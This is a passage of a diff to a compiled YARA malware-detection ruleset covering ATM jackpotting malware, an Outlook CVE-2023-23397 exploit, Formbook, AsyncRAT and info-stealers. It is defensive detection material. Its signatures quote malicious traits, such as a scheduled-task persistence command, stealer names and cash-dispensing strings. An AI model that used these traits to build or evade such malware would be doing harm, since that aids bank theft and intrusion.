+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.NVISOSPIT.yar#L3-L18"
 		license_url = "N/A"
-		logic_hash = "7dca049f024f09c2e778b0693a1015d1fc5a006fc564de914e85231cb5d73da3"
+		hash = "d7ce7b152f0da49e96fa32a9336b35253905d9940b001288d0df55d8f8b3951f"
+		logic_hash = "11c1fea74b72a7821ce76a95846a2caff7354e71906496d9530cb44339a49a98"
 		score = 75
 		quality = 90
 		tags = "FILE"
-		hash1 = "6b2fac8331e4b3e108aa829b297347f686ade233b24d94d881dc4eff81b9eb30"
 
 	strings:
-		$String1 = "Project Alice" ascii nocase
-		$String2 = "Can't dispense requested amount." ascii nocase
-		$String3 = "Selected cassette is unavailable" ascii nocase
-		$String4 = "ATM update manager" wide nocase
-		$String5 = "Input PIN-code for access" wide nocase
-		$String6 = "Supervisor ID" wide nocase
-		$Code1 = {50 68 08 07 00 00 6A 00 FF 75 0C FF 75 08 E8}
-		$Code2 = {50 6A 00 FF 75 10 FF 75 0C FF 75 08 E8}
-		$Code3 = {68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 0B C0 75 29 6A}
+		$MalwareName = "NVISOSPIT" ascii fullword
+		$DispenseCommand = "Calling WFSExecute() to dispense $%d" fullword ascii
+		$Code = {C6 85 7D F9 FF FF 4D C6 85 7E F9 FF FF 4D C6 85 7F F9 FF FF 4B}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 200KB and 4 of ( $String* ) and all of ( $Code* )
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of them
 }
-
-rule R3C0NST_ATM_Malware_Ploutusi : FILE
+rule R3C0NST_ATM_Malware_XFSADM : FILE
 {
 	meta:
-		description = "Detects Ploutus I .NET samples based on MetabaseQ report"
+		description = "Detects ATM Malware XFSADM"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "02104112-6f81-5d19-935d-45cfcd2fa41c"
-		date = "2021-03-03"
-		modified = "2021-03-04"
-		reference = "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ploutus-I.yar#L3-L26"
+		id = "57124fef-73a1-5978-b165-b1b7d7c1196e"
+		date = "2019-06-21"
+		modified = "2019-07-11"
+		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSADM.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "77100d300a40219187f5c4b8270f599a91652b69980fe450b791181b8c30b5a4"
+		logic_hash = "2dd0b9e0a2dd18725c9342a234520c96c6b30cf3ce7196562b2380a39f5f8673"
 		score = 75
-		quality = 90
+		quality = 84
 		tags = "FILE"
-		hash1 = "4f6d4c6f97caf888a98a3097b663055b63e605f15ea8f7cc7347283a0b8424c1"
-		hash2 = "8ca29597152dc79bcf79394e1ae2635b393d844bb0eeef6709d37e6778457b31"
-		hash3 = "dce1f01c08937fb5c98964a0911de403eed2101a9d46c5eb9899755c40c3765a"
-		hash4 = "3a1d992277a862640a0835af9dff4b029cfc6c5451e9716f106efaf07702a98c"
+		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
 
 	strings:
-		$Code = {28 ?? 02 00 06 2a}
+		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
+		$Code2 = {68 98 01 00 00 50 FF 15}
+		$Mutex = "myXFSADM" nocase wide
+		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" nocase ascii
+		$XFSCommand1 = "WfsExecute" nocase ascii
+		$XFSCommand2 = "WfsGetInfo" nocase ascii
+		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" nocase ascii
+		$WindowName = "XFS ADM" nocase wide
+		$FindWindow = "ADM rec" nocase wide
+		$LogFile = "xfs.log" nocase ascii
+		$TmpFile = "~pipe.tmp" nocase ascii
 
 	condition:
-		filesize < 300KB and $Code and pe.pdb_path contains "Diebold.pdb" and pe.imports ( "mscoree.dll" , "_CorExeMain" ) and ( for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . type == pe.RESOURCE_TYPE_VERSION and ( pe.version_info [ "InternalName" ] contains "Diebold.exe" ) ) )
+		uint16( 0 ) == 0x5A4D and filesize < 500KB and 4 of them
 }
 rule R3C0NST_UNC2891_Winghook : FILE
 {
@@ -58657,31 +59084,6 @@ rule R3C0NST_UNC2891_Winghook : FILE
 		uint32( 0 ) == 0x464c457f and filesize < 100KB and 1 of ( $code* ) and all of ( $str* )
 }
 
-rule R3C0NST_ATM_Malware_Atmspitter : FILE
-{
-	meta:
-		description = "Detects ATM Malware ATMSpitter"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "4497f304-6f04-5f5d-91ba-9124e5262078"
-		date = "2016-07-20"
-		modified = "2019-03-29"
-		reference = "https://topics.amcham.com.tw/2017/02/looking-back-at-the-first-banks-atm-heist/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMSpitter.yar#L3-L21"
-		license_url = "N/A"
-		hash = "658b0502b53f718bd0611a638dfd5969"
-		logic_hash = "684820ed29c50a41bd262862cb97c70c0cbb8554e7e4be300986519423249c50"
-		score = 75
-		quality = 65
-		tags = "FILE"
-
-	strings:
-		$Code_Bytes = { B9 E0 07 00 00 66 ?? ?? ?? ?? 0F 85 DD 02 00 00 66 ?? ?? ?? ?? ?? 0F 85 D1 02 00 00 }
-		$Service = "Congratulations! You are very skilled in reverse engineering!" nocase ascii
-
-	condition:
-		(hash.sha256 ( 0 , filesize ) == "4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958" ) or ( $Code_Bytes and $Service )
-}
-
 rule R3C0NST_ATM_CINEO4060_Blackbox : FILE
 {
 	meta:
@@ -58714,6 +59116,151 @@ rule R3C0NST_ATM_CINEO4060_Blackbox : FILE
 	condition:
 		( uint16( 0 ) == 0x4b50 and filesize < 50KB and all of ( $MyAgent* ) ) or ( uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and $Hook and $Delphi and all of ( $WMIHOOK* ) or all of ( $TRICK* ) )
 }
+rule R3C0NST_ATM_Malware_Ripper : ATMRIPPER MALWARE FILE
+{
+	meta:
+		description = "Rule detects Thailand ATM Jackpot malware RIPPER (unpacked)"
+		author = "Frank Boldewin"
+		id = "38dfda5b-45cc-55d4-b619-91fa31c09a09"
+		date = "2016-08-01"
+		modified = "2019-02-27"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ripper.yar#L1-L22"
+		license_url = "N/A"
+		logic_hash = "bb7b474330defe6d071b9595687d4510961055fa243a26306698c1e029a935f1"
+		score = 75
+		quality = 90
+		tags = "ATMRIPPER, MALWARE, FILE"
+		malware_family = "ATM-malware RIPPER"
+
+	strings:
+		$Card_Hash1 = "be59a724feae790b3f315edf71a8450888c021f113e3c2b471e174130c201852" nocase ascii
+		$Card_Hash2 = "f26a57da928d6f3e3480dfc7d03761161191bdb170e10ca15c7ac5de6912945c" nocase ascii
+		$Card_Hash3 = "692cdaf6e42ab3a4f307e5d047249f7b30ceddd6bc88f22ca032412419bd62b7" nocase ascii
+		$Card_Hash4 = "0679c7c0c9b0d6919c12cbc087e942d7bf48d3a78cd3ec80321fbfd1b33a1904" nocase ascii
+		$Code_Bytes1 = { 68 CB 00 00 00 50 FF 15 ?? ?? ?? ?? EB 19 }
+		$Code_Bytes2 = { E8 ?? ?? ?? ?? 83 C4 18 6A 02 53 53 FF 15 ?? ?? ?? ?? 68 74 12 43 00 8D 55 A4 }
+		$Service = "DBACKUP SERVICE" nocase wide
+
+	condition:
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 2 of ( $Card_Hash* ) and all of ( $Code_Bytes* ) and filesize < 400KB and ( $Service in ( 0x2f000 .. 0x30000 ) )
+}
+rule R3C0NST_ATM_Malware_Loup : FILE
+{
+	meta:
+		description = "Detects ATM Malware Loup"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "4786362f-b2c5-5b69-8b06-9216561286e6"
+		date = "2020-08-17"
+		modified = "2020-08-17"
+		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Loup.yar#L1-L16"
+		license_url = "N/A"
+		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+		logic_hash = "39efced4ee3a6147acf5732e4be3a5e9859268b35b79f5e8e87d7c4d77a588c0"
+		score = 75
+		quality = 90
+		tags = "FILE"
+
+	strings:
+		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii nocase
+		$String2 = "CurrencyDispenser1" ascii nocase
+		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
+}
+rule R3C0NST_Exploit_Outlook_CVE_2023_23397 : CVE_2023_23397 FILE
+{
+	meta:
+		description = "Detects Outlook appointments exploiting CVE-2023-23397"
+		author = "Frank Boldewin"
+		id = "7e355e5f-93ca-561d-9a12-f73f1d429e4d"
+		date = "2023-03-19"
+		modified = "2023-03-25"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Exploit_Outlook_CVE_2023_23397.yar#L1-L30"
+		license_url = "N/A"
+		logic_hash = "1847e8223b2f6d3ec5108e15ee46ef031ee1e26d3a5e8ed4a70c77b031f6a5b6"
+		score = 75
+		quality = 86
+		tags = "CVE-2023-23397, FILE"
+		Author = "Frank Boldewin (@r3c0nst)"
+		Hash1 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
+		Hash2 = "a034427fd8524fd62380c881c30b9ab483535974ddd567556692cffc206809d1"
+		Hash3 = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
+		Hash4 = "1543677037fa339877e1d6ef2d077f94613afbcd6434d7181a18df74aca7742b"
+
+	strings:
+		$ipmtask = "IPM.Task" wide ascii
+		$ipmappointment = "IPM.Appointment" wide ascii
+		$ipmtaskb64 = "IPM.Task" base64 base64wide
+		$ipmappointmentb64 = "IPM.Appointment" base64 base64wide
+		$unc_path1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00|3? 00 3? 00|3? 00 3? 00 3? 00) }
+		$unc_path2 = { 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3?|3? 3?|3? 3? 3?) }
+		$unc_a = "\x00\x00\x00\x5c\x5c" base64
+		$unc_w = "\x00\x00\x5c\x00\x5c" base64wide
+		$mail1 = "from:" ascii wide nocase
+		$mail2 = "received:" ascii wide nocase
+
+	condition:
+		(( uint32be( 0 ) == 0xD0CF11E0 or uint32be( 0 ) == 0x789F3E22 ) or ( all of ( $mail* ) ) ) and ( ( $ipmtask or $ipmappointment ) or ( $ipmtaskb64 or $ipmappointmentb64 ) ) and ( ( $unc_path1 or $unc_path2 ) or ( $unc_a or $unc_w ) )
+}
+
+rule R3C0NST_ATM_Malware_Dispenserxfs : FILE
+{
+	meta:
+		description = "No description has been set in the source file - R3c0nst"
+		author = "Frank Boldewin"
+		id = "52b1aa57-283b-54d7-bd1b-fb5da5f8d269"
+		date = "2019-02-28"
+		modified = "2019-02-28"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispenserXFS.yar#L3-L13"
+		license_url = "N/A"
+		logic_hash = "0e588e2ba03d5eb750183600cce278e791a71f86fbf933ba9d7fda352bd37e2f"
+		score = 75
+		quality = 59
+		tags = "FILE"
+
+	strings:
+		$Code_Bytes = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
+		$XFSKILL = "injected mxsfs killer into" nocase ascii wide
+		$PDB = "C:\\_bkittest\\dispenser\\Release_noToken\\dispenserXFS.pdb" nocase ascii wide
+
+	condition:
+		(hash.sha256 ( 0 , filesize ) == "867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
+}
+rule R3C0NST_ATM_Malware_Xfscashncr : FILE
+{
+	meta:
+		description = "Detects ATM Malware XFSCashNCR"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "8886cd00-4f4a-5f25-99e0-0806f5e1b4b4"
+		date = "2019-08-28"
+		modified = "2019-08-28"
+		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSCashNCR.yar#L1-L21"
+		license_url = "N/A"
+		logic_hash = "87f197058d4b515cb4829b5e403a96b88eb95cda81e53a9e1484df8c743d8c4a"
+		score = 75
+		quality = 90
+		tags = "FILE"
+		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
+
+	strings:
+		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
+		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
+		$StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
+		$StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
+		$StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
+		$StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
+		$PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
+		$LogFile = "XfsLog.txt" nocase ascii
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize < 1500KB and 4 of them
+}
 rule R3C0NST_UNC2891_Slapstick : FILE
 {
 	meta:
@@ -58742,14 +59289,64 @@ rule R3C0NST_UNC2891_Slapstick : FILE
 	condition:
 		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
 }
+rule R3C0NST_Aplib_Decompression : FILE
+{
+	meta:
+		description = "Detects aPLib decompression code often used in malware"
+		author = "@r3c0nst"
+		id = "f45c73f5-d316-5fea-a8c4-fd930733415f"
+		date = "2021-03-24"
+		modified = "2021-03-25"
+		reference = "https://ibsensoftware.com/files/aPLib-1.1.1.zip"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/aPLib_decompression.yar#L1-L16"
+		license_url = "N/A"
+		logic_hash = "1150701724fdb487ebe8fb959afd12fff37a8e9137cb94e78e976a2566ec5fa4"
+		score = 75
+		quality = 90
+		tags = "FILE"
+
+	strings:
+		$pattern1 = { FC B2 80 31 DB A4 B3 02 }
+		$pattern2 = { AC D1 E8 74 ?? 11 C9 EB }
+		$pattern3 = { 73 0A 80 FC 05 73 ?? 83 F8 7F 77 }
+
+	condition:
+		filesize < 10MB and all of them
+}
+
+rule R3C0NST_ATM_Malware_ATMITCH : FILE
+{
+	meta:
+		description = "Detects ATM Malware ATMItch"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "4d7e9615-9db6-5fc7-b95e-b8c7b2c034a8"
+		date = "2019-03-18"
+		modified = "2019-03-18"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMItch.yar#L3-L14"
+		license_url = "N/A"
+		logic_hash = "4278cbcd8c465ba57b65a166e0bd48dcc73eae8660972478d3116bc0d73cf3c4"
+		score = 75
+		quality = 82
+		tags = "FILE"
+
+	strings:
+		$STRING1 = "SCREEN and think what does you DO" nocase ascii wide
+		$STRING2 = "Receive CASH UNIT info first, then LOOK on" nocase ascii wide
+		$STRING3 = "Unknown command mnemonic, check it and repeat again" nocase ascii wide
+		$STRING4 = "Catch some money, bitch!" nocase ascii wide
+
+	condition:
+		( uint16( 0 ) == 0x5A4D and 1 of them ) or ( pe.imphash ( ) == "655ad5439db0832c5a3f86d0a68ddaac" )
+}
 /*
  * YARA Rule Set
  * Repository Name: CAPE
  * Repository: https://github.com/kevoreilly/CAPEv2
- * Retrieval Date: 2025-06-08
- * Git Commit: 3468ef14dbf65c0c3219e32830860967d6da51d5
+ * Retrieval Date: 2025-06-15
+ * Git Commit: 0ae5d09a6a783302535883359d2b13437136d95e
  * Number of Rules: 166
- * Skipped: 0 (age), 16 (quality), 3 (score), 0 (importance)
+ * Skipped: 0 (age), 15 (quality), 3 (score), 0 (importance)
  *
  *
  * LICENSE
@@ -59420,2627 +60017,2645 @@ The file analyzer/windows/modules/amsi.py uses parts of pywintrace
 under the Apache License, Version 2.0.
 
  */
-rule CAPE_Rhadamanthys
-{
-	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly"
-		id = "d9d387e1-76b3-55f6-a40f-a8c9cb9e9bea"
-		date = "2023-04-18"
-		modified = "2023-04-18"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Rhadamanthys.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "3c8fbfe14f81e099fc900023d9c856e3f45b99af38889ed952b2ac67a636f51d"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "bp0=$conf-11,hc0=1,action0=setdump:edx::ebx,bp1=$conf+64,hc1=1,action1=dump,count=0,typestring=Rhadamanthys Config,ntdll-protect=0"
-		packed = "9e28586ab70b1abdccfe087d81e326a0703f75e9551ced187d37c51130ad02f5"
-
-	strings:
-		$rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00}
-		$code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB}
-		$conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08}
-
-	condition:
-		2 of them
-}
-rule CAPE_Formhooka
-{
-	meta:
-		description = "Formbook Anti-hook Bypass"
-		author = "kevoreilly"
-		id = "6369de74-99eb-57ae-a315-c15f22effc73"
-		date = "2024-10-11"
-		modified = "2024-10-11"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Formbook.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "21b8101a7039cfad0e9d49cc1f055bc23a2eb4c973dcda2a81a007e452d77a6d"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$remap_ntdll_0,action0=setedx:ntdll,count0=1,bp1=$remap_ntdll_1,action1=setdst:ntdll,count1=1,force-sleepskip=1"
-		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
-		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
-
-	strings:
-		$remap_ntdll_0 = {33 56 04 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
-		$remap_ntdll_1 = {33 56 0C 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
-
-	condition:
-		any of them
-}
-rule CAPE_Formhookb
-{
-	meta:
-		description = "Formbook Anti-hook Bypass"
-		author = "kevoreilly"
-		id = "479afd45-8e59-5b31-8315-faf8284f0de4"
-		date = "2024-10-11"
-		modified = "2024-10-11"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Formbook.yar#L16-L29"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "b8b677ca239c6c5faf44f7a46c1e3e231f5708fb13aac724fd3ac9f865b965d8"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$entry,action0=scan,hc0=1,bp1=$new_remap+6,action1=setdst:ntdll,count=0,force-sleepskip=1"
-		packed = "08c5f44d57f5ccc285596b3d9921bf7fbbbf7f9a827bb3285a800e4c9faf6731"
-
-	strings:
-		$remap_ntdll = {33 96 [2] 00 00 8D 86 [2] 00 00 68 F0 00 00 00 50 89 [2-5] E8 [4-10] 6A 00 6A 0? 8D 4D ?? 51 6A}
-		$entry = {55 8B EC 83 EC ?4 53 56 57 [480-520] 8B E5 5D C3}
-		$new_remap = {90 90 90 90 90 90 8B (86 [2] 00 00|46 ??|06) 5F 5E 5B 8B E5 5D C3}
-
-	condition:
-		2 of them
-}
-rule CAPE_Formconfa
-{
-	meta:
-		description = "Formbook Config Extraction"
-		author = "kevoreilly"
-		id = "f9c3fc92-e2c8-5968-b0f4-80bd8199b7ca"
-		date = "2024-10-11"
-		modified = "2024-10-11"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Formbook.yar#L31-L43"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "b0aa4cec55a21245d8104380c531dd6cc0fdef64fbefd79616eadfb4e95b2d75"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$c2,action0=string:rcx+1,bp1=$decoy+67,action1=string:rcx+1,count=0,typestring=Formbook Config"
-		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
-
-	strings:
-		$c2 = {44 8B C6 48 8B D3 49 8B CE E8 [4] 44 88 23 41 8B DD 48 8D [2] 66 66 66 0F 1F 84 00 00 00 00 00 BA 8D 00 00 00 41 FF C4}
-		$decoy = {8B D7 0F 1F 44 00 00 0F B6 03 FF C0 48 98 48 03 D8 48 FF CA 75 ?? 44 0F B6 03 48 8D 53 01 48 8D 4C [2] E8}
-
-	condition:
-		all of them
-}
-rule CAPE_Formhelper
+rule CAPE_Themida : FILE
 {
 	meta:
-		description = "Formbook Config Extraction"
+		description = "Themida Packer"
 		author = "kevoreilly"
-		id = "88ff1354-1ae7-5380-a586-ef95212d59df"
-		date = "2024-10-11"
-		modified = "2024-10-11"
+		id = "cd5c8b08-4864-57f7-b218-1bcb6892bea8"
+		date = "2024-09-11"
+		modified = "2024-09-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Formbook.yar#L45-L57"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "77cdfc94aac089c4f2590f4afbab35351fc6e104e67813548c68c59d27019a63"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/binaries/Themida.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "c4f1e01a3fe3cb66062ce03253bfe9edc09dc6f1a77db99b281106e8ceff9257"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "clear,bp2=$config,action2=scan,count=0"
-		packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1"
+		tags = "FILE"
+		packed = "6337ff4cf413f56cc6c9a8e67f24b8d7f94f620eae06ac9f0b113b5ba82ea176"
 
 	strings:
-		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 ?? 33 C0 4C 8B E9 4C 89}
-		$decode = {66 66 66 66 0F 1F 84 00 00 00 00 00 0F B6 41 01 48 FF C9 28 41 01 49 FF C9}
+		$code = {FC 31 C9 49 89 CA 31 C0 31 DB AC 30 C8 88 E9 88 D5 88 F2 B6 08 66 D1 EB 66 D1 D8 73 09}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Formconfb
+rule CAPE_Asyncrat_Kingrat
 {
 	meta:
-		description = "Formbook Config Extraction"
-		author = "kevoreilly"
-		id = "4c8c7939-07e8-5a1e-92a3-b62e322fb9b6"
-		date = "2024-10-11"
-		modified = "2024-10-11"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "45efdcdf-b255-5913-97eb-f296d2c4eb1f"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Formbook.yar#L59-L73"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "8a96ef5c6cebb51186acd099b795066e8e8b2c2adbed4dcc66b81228f70e5c4f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L1-L30"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "1400d2029dfb66d8f2dc34db8643d6301f3af9bd356639f883d2c10bcc0c3947"
 		score = 75
-		quality = 70
+		quality = 33
 		tags = ""
-		cape_options = "clear,bp0=$c2_1,bp0=$c2_2+38,action0=string:rcx+1,bp1=$decoy,action1=string:rcx+1,bp2=$config,action2=scan,count=0,typestring=Formbook Config"
-		packed = "60571b2683e7b753a77029ebe9b5e1cb9f3fbfa8d6a43e4b7239eefd13141ae4"
+		cape_type = "AsyncRAT Payload"
 
 	strings:
-		$c2_1 = {44 0F B6 5D ?? 45 84 DB 74 ?? 48 8D 4D [1-5] 41 80 FB 2F 74 11 0F B6 41 01 48 FF C1 FF C3 44 0F B6 D8 84 C0 75}
-		$c2_2 = {49 8D 8D [2] 00 00 B2 ?? E8 [4] 4D 8D 85 [2] 00 00 49 8D 8D [2] 00 00 BA ?? 00 00 00 E8}
-		$decoy = {45 3B B5 [2] 00 00 [0-7] 44 8D 1C 33 48 8D 7D [1-5] 42 C6 44 [2] 00 [0-4] 48 8B CF E8}
-		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 F6 33 C0 4C 8B E9 4C 89 75}
+		$str_async = "AsyncClient" wide ascii nocase
+		$str_aes_exc = "masterKey can not be null or empty" wide ascii
+		$str_schtasks = "schtasks /create /f /sc onlogon /rl highest" wide ascii
+		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
+		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
+		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$dcrat_1 = "dcrat" wide ascii nocase
+		$dcrat_2 = "qwqdan" wide ascii
+		$dcrat_3 = "YW1zaS5kbGw=" wide ascii
+		$dcrat_4 = "VmlydHVhbFByb3RlY3Q=" wide ascii
+		$dcrat_5 = "save_Plugin" wide ascii
+		$ww2 = "WorldWindClient" wide fullword nocase
+		$ww3 = "WorldWindStealer" wide fullword nocase
+		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
+		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
+		$prynt = /Prynt(\s)?Stealer/ ascii wide
 
 	condition:
-		2 of them
+		( not any of ( $dcrat* ) and not any of ( $ww* ) and not $prynt ) and 6 of them and #patt_config >= 10
 }
-rule CAPE_Formconfc
